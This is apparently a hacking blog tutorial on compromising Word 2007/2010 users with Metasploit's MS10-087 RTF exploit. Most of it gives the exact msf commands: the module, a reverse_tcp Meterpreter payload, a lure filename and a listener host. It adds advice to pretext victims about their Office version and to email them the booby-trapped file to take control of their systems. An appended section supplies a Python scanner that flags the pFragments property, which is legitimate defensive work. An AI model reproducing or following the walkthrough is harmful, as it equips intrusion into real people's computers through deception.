As web servers and operating systems have become hardened and now sit behind significant perimeter defenses, hackers have migrated to the easiest route to the pot of gold: the often unpatched, unhardened client-side system, with little in the way of defenses and a plethora of vulnerable software, including the ubiquitous Microsoft Office products.
This hack will work on Word 2007 or Word 2010. If you know who your target is, you can easily pretext their Office version by saying you want to make sure it is compatible with the file you are about to send them. We will exploit a buffer overflow in Word to plant a listener on our target system. I'm assuming that you have the victim's IP address and have verified that Microsoft Office is running (a good assumption, but it's better to verify).
Step 1: Start Metasploit
So, let's fire up Metasploit and find the module exploit/windows/fileformat/ms10_087_rtf_pfragments_bof.
Now, set Metasploit to use this exploit by typing:
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
Step 2: Set a Payload
Then we need to set a payload. In this case, we wish to use Metasploit’s powerful Meterpreter to establish a listener on the victim’s system.
msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp
Step 3: Show Options
Now, let's look at our options. As you know from my previous Metasploit blogs, every exploit has options, some mandatory and some not. Let's take a look at the options for this exploit by typing:
msf > show options
Step 4: Change FILENAME
We can see from the screenshot above that Metasploit has a number of options for this exploit. First, we are creating a .rtf file, and the FILENAME option sets the name Metasploit gives it. Let's change that name to something more inviting to our victim, such as newyearsgreeting.rtf.
msf > set FILENAME newyearsgreeting.rtf
Step 5: Set Your Local Host
Next we need to set the LHOST, or local host. This is the system we will be listening from, usually our local system, but it could be any system you want to listen from. We simply set LHOST to the IP address of our listening system, in this case 192.168.1.100.
msf > set LHOST 192.168.1.100
Step 6: Last Check of Options
Before we exploit the victim’s system, let’s check to make sure all our options are set properly.
msf > show options
Note in the screenshot that the FILENAME is now set to newyearsgreeting.rtf and the LHOST is 192.168.1.100.
Step 7: Exploit
Now, we are ready to exploit. Simply type:
msf > exploit
You can see that Metasploit has generated a file called newyearsgreeting.rtf and placed it at /root/.msf4/local/newyearsgreeting.rtf.
Step 8: Send the File to the Victim
Now we need to send this file to the victim by email or another method. Once the victim opens the file, the Word application will hang or crash, leaving us with an active Meterpreter session on the victim's system. With an active Meterpreter session on the victim's system, we have nearly total control of it, or "own" it.
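From the defender's side, the file this module writes is an RTF that carries the pFragments shape property (the property the MS10-087 bug is in), something legitimate documents almost never contain, so a mail gateway or file scanner can flag it before Word ever opens it. The Python check below is an added example, not part of the original post or of Metasploit; it decodes RTF hex escapes first so that a property name hidden as pFr\'61gments does not slip past, and the three sample RTF strings are constructed here for the demonstration, not real exploit files.

```python
import re

# Constructed sample RTF content (not real exploit files): a benign document,
# one carrying the pFragments shape property that the MS10-087 module relies
# on, and one where that property name is hidden behind RTF hex escapes (\'hh).
BENIGN_RTF = rb"{\rtf1\ansi{\fonttbl{\f0 Arial;}}\f0 Happy New Year!\par}"
SUSPECT_RTF = rb"{\rtf1\ansi{\shp{\sp{\sn pFragments}{\sv 1;4;00aabbccdd}}}}"
ESCAPED_RTF = rb"{\rtf1\ansi{\shp{\sp{\sn pFr\'61gments}{\sv 1;4;00aabbccdd}}}}"

# \'hh : RTF hex escape encoding a single byte
HEX_ESCAPE = re.compile(rb"\\'([0-9a-fA-F]{2})")
# \sn pFragments ... \sv <value> : shape property name followed by its value
PFRAG = re.compile(rb"\\sn\s*pfragments\b.*?\\sv\s*([^}]*)",
                   re.IGNORECASE | re.DOTALL)


def normalize_rtf(data: bytes) -> bytes:
    """Decode RTF hex escapes so keyword matching sees the real characters."""
    return HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inspect_rtf(data: bytes) -> dict:
    """Report whether RTF content carries a pFragments shape property.

    sv_length is the length of the property value (where the oversized data
    lives); hex_escaped_name means the name was only visible after decoding.
    """
    result = {
        "is_rtf": data.lstrip().startswith(b"{\\rtf"),
        "pfragments": False,
        "sv_length": 0,
        "hex_escaped_name": False,
    }
    if not result["is_rtf"]:
        return result
    match = PFRAG.search(normalize_rtf(data))
    if match:
        result["pfragments"] = True
        result["sv_length"] = len(match.group(1).strip())
        # No match on the raw bytes means the name was hidden with \'hh escapes
        result["hex_escaped_name"] = PFRAG.search(data) is None
    return result


def verdict(data: bytes) -> str:
    """One-word triage verdict for a mail gateway or file scanner."""
    info = inspect_rtf(data)
    if not info["is_rtf"]:
        return "not-rtf"
    return "suspect" if info["pfragments"] else "clean"
```

The check keys on the property name rather than the filename, since the .rtf extension the module chooses is cosmetic; on the Office side, the MS10-087 update and the Trust Center's File Block setting for RTF files close this path regardless of what the attachment is called.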